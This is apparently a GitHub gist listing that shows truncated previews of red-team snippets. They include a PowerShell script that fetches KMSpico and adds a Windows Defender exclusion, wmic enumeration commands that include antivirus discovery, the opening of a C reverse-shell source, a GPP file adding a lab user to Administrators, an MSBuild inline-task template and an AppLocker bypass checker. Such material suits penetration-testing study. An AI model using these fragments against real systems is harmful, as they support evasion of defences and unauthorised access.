This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# via ippsec | |
IFS=$'\n' | |
old_process=$(ps -eo command) | |
while true; do | |
new_process=$(ps -eo command) | |
diff <(echo "$old_process") <(echo "$new_process") |grep [\<\>] | |
sleep 1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if ! [ $(id -u) = 0 ] | |
then | |
echo "Run as root" | |
exit 1 | |
fi | |
if [ -e ~/.xmodmaprc ];then | |
xmodmap ~/.xmodmaprc |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$KMSUrl = "https://codeload.github.com/charygao/KMSpico_v10.2.0/zip/master" | |
$KMSDst = "C:\windows\temp\KMSpico.zip" | |
$KMSUnzip = "C:\windows\temp\KMSPico" | |
$KMSExe = "C:\Windows\Temp\KMSPico\KMSpico_v10.2.0-master\KMSpico Portable\AutoPico.exe" | |
if ((Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Windows 10" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2016") { | |
Write-Host "Temporarily disabling Windows Defender Real time Scanning" | |
Set-MpPreference -ExclusionPath C:\temp\windows\ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Host Enumeration: | |
--- OS Specifics --- | |
wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
wmic computersystem LIST full | |
--- Anti-Virus --- | |
wmic /namespace:\\root\securitycenter2 path antivirusproduct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
param( | |
[Parameter(Mandatory)] | |
[string]$Path | |
) | |
#Created by Pierre.Audonnet@microsoft.com | |
# | |
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt | |
# | |
# keytab { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* compile: i686-w64-mingw32-gcc -o brax.exe reverse.c -lws2_32 */ | |
#include <winsock2.h> | |
#include <stdio.h> | |
#pragma comment(lib, "w2_32") | |
WSADATA wsaData; | |
SOCKET Winsock; | |
SOCKET Sock; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2019-03-07 17:32:24" uid="{ECC42B3A-5D61-4705-BC17-467C4A2764DE}"><Properties action="U" newName="" description="GPP - admins" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-1302490888-793887298-1113"/></Members></Properties></Group> | |
<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Remote Desktop Users (built-in)" image="2" changed="2019-03-07 17:33:38" uid="{5F8E65C1-F1BA-4207-8549-5D6606F8E7DF}"><Properties action="U" newName="" description="gpp - add chry rdp" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-555" groupName="Remote Desktop Users (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-130 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
<Task> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# AppLocker Bypass Checker (Default Rules) v2.0 | |
# | |
# One of the Default Rules in AppLocker allows everything in the folder C:\Windows to be executed. | |
# A normal user shouln't have write permission in that folder, but that is not always the case. | |
# This script lists default ACL for the "BUILTIN\users" group looking for write/createFiles & execute authorizations | |
# | |
# @Author: Sparc Flow in "How to Hack a Fashion Brand" | |
# | |
# NOTE: change the group and root_folder variables to suit your needs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"bufio" | |
"bytes" |
OlderNewer